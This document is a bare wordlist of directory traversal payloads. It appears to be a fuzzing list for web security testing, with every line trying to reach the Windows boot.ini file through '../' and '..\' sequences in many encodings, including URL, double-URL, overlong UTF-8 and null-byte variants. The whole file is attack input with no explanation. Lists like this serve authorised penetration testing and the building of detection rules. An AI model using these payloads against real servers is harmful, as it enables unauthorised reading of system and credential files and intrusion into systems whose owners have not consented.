-/../../../../../../../../../../../boot.ini -/..\../..\../..\../..\../..\../..\../boot.ini -/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini -\..\..\..\..\..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\..\..\..\..\boot.ini%00 -..\..\..\..\..\..\..\..\..\..\boot.ini -/../../../../../../../../../../../boot.ini%00.html -/../../../../../../../../../../../boot.ini%00.jpg -/.../.../.../.../.../ -..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -../boot.ini -../../boot.ini -../../../boot.ini -../../../../boot.ini -../../../../../boot.ini -../../../../../../boot.ini -../../../../../../../boot.ini -../../../../../../../../boot.ini -..%2fboot.ini -..%2f..%2fboot.ini -..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -%2e%2e/boot.ini -%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -..%252fboot.ini -..%252f..%252fboot.ini -..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -%252e%252e/boot.ini -%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -..\boot.ini -..\..\boot.ini -..\..\..\boot.ini -..\..\..\..\boot.ini -..\..\..\..\..\boot.ini -..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\..\..\boot.ini -..%255cboot.ini -..%255c..%255cboot.ini -..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -..%5c..%5cboot.ini -..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -%2e%2e\boot.ini -%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%252e%252e\boot.ini -%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -..%c0%afboot.ini -..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -..%25c0%25afboot.ini -..%25c0%25af..%25c0%25afboot.ini -..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afboot.ini -%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -..%c1%9cboot.ini -..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -..%25c1%259cboot.ini -..%25c1%259c..%25c1%259cboot.ini -..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259cboot.ini -%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -..%%32%66boot.ini -..%%32%66..%%32%66boot.ini -..%%32%66..%%32%66..%%32%66boot.ini -..%%32%66..%%32%66..%%32%66..%%32%66boot.ini -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66boot.ini -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66boot.ini -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66boot.ini -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66boot.ini -%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65%%32%66boot.ini -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66boot.ini -..%%35%63boot.ini -..%%35%63..%%35%63boot.ini -..%%35%63..%%35%63..%%35%63boot.ini -..%%35%63..%%35%63..%%35%63..%%35%63boot.ini -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63boot.ini -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63boot.ini -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63boot.ini -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63boot.ini -%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/boot.ini -%%32%65%%32%65%%35%63boot.ini -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63boot.ini -../boot.ini -../../boot.ini -../../../boot.ini -../../../../boot.ini -../../../../../boot.ini -../../../../../../boot.ini -../../../../../../../boot.ini -../../../../../../../../boot.ini -..%2fboot.ini -..%2f..%2fboot.ini -..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -%2e%2e/boot.ini -%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -..%252fboot.ini -..%252f..%252fboot.ini -..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -%252e%252e/boot.ini -%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini 